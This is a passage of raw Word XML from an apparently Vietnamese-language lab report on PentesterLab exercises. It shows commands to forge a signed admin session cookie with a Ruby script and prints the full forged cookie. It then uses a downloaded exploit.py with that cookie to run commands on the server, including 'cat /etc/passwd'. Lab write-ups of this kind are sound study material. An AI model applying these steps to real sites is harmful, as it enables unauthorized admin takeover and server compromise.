          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gem</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> install pik</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182892FC" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiếp theo ta tải file ruby để crack theo đường link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId269" w:history="1">
        <w:r w:rsidRPr="00F12C2B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          </w:rPr>
          <w:t>https://drive.google.com/file/d/1HkI7lHwVhQR1Pe2_casV0VxaE_F1hgt7/view?usp=sharing</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="679B8358" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Chúng ta mở cmd và dùng lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540AB0D7" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ruby tamper-cookie.rb cookie.txt secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392F1B32" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Sẽ ra được cookie dành cho admin và chúng ta lưu lại để chèn vào session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F332700" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="00A8787C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:t>BAh7B0kiD3Nlc3Npb25faWQGOgZFRiJFZDU3NDJhNmM5ZGRhMmMzZWZhN2Jj%0AZmM1OGI0ZjAyMzBlZmVmYzI5YzYyYmU4M2I5Nzk0Nzc5NTQ0OWM4YWEzOUki%0ACXVzZXIGOwBGbzoJVXNlcgs6GEBfcGVyc2lzdGVuY2Vfc3RhdGVvOjJEYXRh%0ATWFwcGVyOjpSZXNvdXJjZTo6UGVyc2lzdGVuY2VTdGF0ZTo6Q2xlYW4HOg5A%0AcmVzb3VyY2VACToLQG1vZGVsYwlVc2VyOgtAbG9naW5JIgl0ZXN0BjsAVDoL%0AQGFkbWluVDoOQHBhc3N3b3JkSSIlMDk4ZjZiY2Q0NjIxZDM3M2NhZGU0ZTgz%0AMjYyN2I0ZjYGOwBUOghAaWRpBzoRQF9yZXBvc2l0b3J5bzobRGF0YU1hcHBl%0Acjo6UmVwb3NpdG9yeQg6CkBuYW1lOgxkZWZhdWx0OhNAaWRlbnRpdHlfbWFw%0Ac3sGQAtDOhxEYXRhTWFwcGVyOjpJZGVudGl0eU1hcHsGWwZpB0AJOg1AYWRh%0AcHRlcm86KERhdGFNYXBwZXI6OkFkYXB0ZXJzOjpTcWxpdGVBZGFwdGVyDTsR%0AOxI6DUBvcHRpb25zQzoVRGF0YU1hcHBlcjo6TWFzaHsOSSILc2NoZW1lBjsA%0ARkkiC3NxbGl0ZQY7AEZJIgl1c2VyBjsARjBJIg1wYXNzd29yZAY7AEYwSSIJ%0AaG9zdAY7AEZJIgAGOwBGSSIJcG9ydAY7AEYwSSIKcXVlcnkGOwBGMEkiDWZy%0AYWdtZW50BjsARjBJIgxhZGFwdGVyBjsARkkiDHNxbGl0ZTMGOwBGSSIJcGF0%0AaAY7AEZJIhAvdG1wL2Rucy5kYgY7AEY6IEByZXNvdXJjZV9uYW1pbmdfY29u%0AdmVudGlvbm1GRGF0YU1hcHBlcjo6TmFtaW5nQ29udmVudGlvbnM6OlJlc291%0AcmNlOjpVbmRlcnNjb3JlZEFuZFBsdXJhbGl6ZWQ6HUBmaWVsZF9uYW1pbmdf%0AY29udmVudGlvbm02RGF0YU1hcHBlcjo6TmFtaW5nQ29udmVudGlvbnM6OkZp%0AZWxkOjpVbmRlcnNjb3JlZDoUQG5vcm1hbGl6ZWRfdXJpbzoVRGF0YU9iamVj%0AdHM6OlVSSQ86DEBzY2hlbWVAHjoPQHN1YnNjaGVtZTA6CkB1c2VyMDsNMDoK%0AQGhvc3RAGToKQHBvcnQwOgpAcGF0aEAgOgtAcXVlcnlDOxh7DkkiC3NjaGVt%0AZQY7AEZAFUkiCXVzZXIGOwBGMEkiDXBhc3N3b3JkBjsARjBJIglob3N0BjsA%0ARkAZSSIJcG9ydAY7AEYwSSIKcXVlcnkGOwBGMEkiDWZyYWdtZW50BjsARjBJ%0AIgxhZGFwdGVyBjsARkAeSSIJcGF0aAY7AEZAIDoOQGZyYWdtZW50MDoOQHJl%0AbGF0aXZlMDoUQHNxbGl0ZV92ZXJzaW9uSSIKMy43LjMGOwBUOiNAc3VwcG9y%0AdHNfZHJvcF90YWJsZV9pZl9leGlzdHNUOhVAc3VwcG9ydHNfc2VyaWFsVA%3D%3D%0A--b0b739482613ada6dfe08cdad03ac3b290b0a37f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486C2309" w14:textId="0D417DAD" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Đây là cookie dành cho admin.</w:t>
      </w:r>
      <w:r w:rsidR="0083535F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Bây giờ ta copy vào và thay đổi cookie đã có sẵn trên trình duyệt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7788E9A8" w14:textId="012957B4"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6788AB87">
          <v:shape id="Picture 72" o:spid="_x0000_i1267" type="#_x0000_t75" style="width:422.25pt;height:198.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId270" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A78C69E" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ta nhấn reload lại trang!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66688D83" w14:textId="02EA3FFB" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="404DC779">
          <v:shape id="Picture 73" o:spid="_x0000_i1268" type="#_x0000_t75" style="width:468pt;height:183pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId271" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5409CCEE" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="00F12C2B" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ta đã thành admin của trang web!! Có thể chỉnh sửa và xóa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1707A759" w14:textId="203072F4" w:rsidR="00A8787C" w:rsidRPr="0083535F" w:rsidRDefault="00283404" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="4E90B304">
          <v:shape id="Picture 74" o:spid="_x0000_i1269" type="#_x0000_t75" style="width:360.75pt;height:128.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId272" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BABAF7E" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="0083535F" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083535F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Trang edit của admin!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2478240E" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="0083535F" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083535F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Bước tiếp theo là truy cập vào các trang quản trị và chèn lệnh. Trang dễ bị chèn lệnh khi nhà phát triển không đảm bảo rằng các thông số do người dùng gửi được mã hóa chính xác!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300BF82A" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="0083535F" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083535F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Trước tiên chúng ta truy cập đường dẫn để lấy file exploit.py file code bằng python:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563C3D3F" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="0083535F" w:rsidRDefault="008228FC" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId273" w:history="1">
        <w:r w:rsidR="00A8787C" w:rsidRPr="0083535F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          </w:rPr>
          <w:t>https://drive.google.com/file/d/1agFkx9c68TM6fxlyct-OJS2nzku9fupf/view?usp=sharing</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6006797E" w14:textId="0096065D" w:rsidR="00A8787C" w:rsidRPr="0083535F" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083535F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>trong thư mục này được code với các lỗ hỏng cookie đã bị xác thực,</w:t>
      </w:r>
      <w:r w:rsidR="0083535F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0083535F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>và chúng ta phải chiếm được quyền admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736FCE48" w14:textId="3844787A" w:rsidR="00A8787C" w:rsidRPr="0083535F" w:rsidRDefault="00283404" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="5F72200D">
          <v:shape id="Picture 75" o:spid="_x0000_i1270" type="#_x0000_t75" style="width:305.25pt;height:257.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId274" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2349957F" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="0083535F" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083535F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Với địa chỉ ip của máy chủ server và chúng ta bắt đầu payload bằng </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0083535F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>ip,dữ</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0083535F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> liệu cookie và nhận phản hồi trả về từ máy chủ,đây là các script mạnh mẽ nhất trong việc khai thác các dòng lệnh cũng như tiêm các đoạn SQL để lấy những thông tin từ máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F8EDFF" w14:textId="4E86E6E3" w:rsidR="00A8787C" w:rsidRPr="0083535F" w:rsidRDefault="00283404" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="02D5853E">
          <v:shape id="Picture 76" o:spid="_x0000_i1271" type="#_x0000_t75" style="width:396pt;height:384pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId275" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CF26B4" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="0083535F" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083535F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiếp theo ta dùng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="0083535F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&amp; python c:/exploit.py C:\admin-cookie.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060CA3C8" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="0083535F" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083535F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>File admin-cookie.txt là cookie xác thực của admin mà chúng ta dùng để trang web cấp quyền truy cập cho chúng ta. Ta save lại thành file admin-cookie.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF3E1B6" w14:textId="14B4DD6D" w:rsidR="00A8787C" w:rsidRPr="0083535F" w:rsidRDefault="00283404" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="36CA94A2">
          <v:shape id="Picture 77" o:spid="_x0000_i1272" type="#_x0000_t75" style="width:399pt;height:58.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId276" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0026C37C" w14:textId="77777777" w:rsidR="00A8787C" w:rsidRPr="0083535F" w:rsidRDefault="00A8787C" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083535F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ta có thể gõ bất cứ lệnh cmd nào đều được server phản hồi như trong hình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2620A5" w14:textId="645C640C" w:rsidR="00A8787C" w:rsidRPr="0083535F" w:rsidRDefault="00283404" w:rsidP="0083535F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="060AB8B3">
          <v:shape id="Picture 78" o:spid="_x0000_i1273" type="#_x0000_t75" style="width:318.75pt;height:252pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId277" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DC2677" w14:textId="66BC7C2B" w:rsidR="00070DCA" w:rsidRPr="00070DCA" w:rsidRDefault="00A8787C" w:rsidP="00070DCA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083535F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="0083535F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cat /etc/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="0083535F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> sẽ xuất hiện tập tin mật khẩu ở hình trên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD3F20C" w14:textId="6E650181" w:rsidR="005648F9" w:rsidRPr="00F12C2B" w:rsidRDefault="005648F9" w:rsidP="005648F9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="743B1314" w14:textId="423056EC" w:rsidR="00AC2A7A" w:rsidRDefault="006819DC" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00AC2A7A" w:rsidRPr="00F12C2B">
        <w:t>TÀI LIỆU THAM KHẢO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D26AA0" w14:textId="77777777" w:rsidR="00E707D0" w:rsidRPr="00F12C2B" w:rsidRDefault="008228FC" w:rsidP="008228FC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId278" w:history="1">
        <w:r w:rsidR="00E707D0" w:rsidRPr="00F12C2B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          </w:rPr>
          <w:t>https://pentesterlab.com/exercises/xss_and_mysql_file/course?fbclid=IwAR3SqJOwvpsVd3OD6kWN4DiwtS6Bdo5O8tfyruDY5_MvNEKsB3V7Tmqb6h0</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E707D0" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53836BFB" w14:textId="3196CC65" w:rsidR="00E707D0" w:rsidRDefault="008228FC" w:rsidP="008228FC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId279" w:history="1">
        <w:r w:rsidRPr="00AF083F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.pentesterlab.com/exercises/play_session_injection/course</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="012C0966" w14:textId="11714535" w:rsidR="008228FC" w:rsidRDefault="008228FC" w:rsidP="008228FC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId280" w:history="1">
        <w:r w:rsidRPr="00AF083F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.pentesterlab.com/exercises/play_session_injection/course</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="13E2AC7B" w14:textId="77777777" w:rsidR="008228FC" w:rsidRPr="00E707D0" w:rsidRDefault="008228FC" w:rsidP="00E707D0"/>
    <w:p w14:paraId="59D923D6" w14:textId="77777777" w:rsidR="0067784F" w:rsidRPr="00F12C2B" w:rsidRDefault="0067784F" w:rsidP="00AC2F30">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15490628" w14:textId="77777777" w:rsidR="006819DC" w:rsidRPr="00F12C2B" w:rsidRDefault="006819DC" w:rsidP="00AC2F30">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7797"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="TimesNewRomanPS-ItalicMT" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D7DDC0A" w14:textId="77777777" w:rsidR="00A373C6" w:rsidRPr="00F12C2B" w:rsidRDefault="00A373C6" w:rsidP="00AC2F30">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="TimesNewRomanPS-ItalicMT" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A373C6" w:rsidRPr="00F12C2B" w:rsidSect="0045020F">
      <w:footerReference w:type="default" r:id="rId281"/>
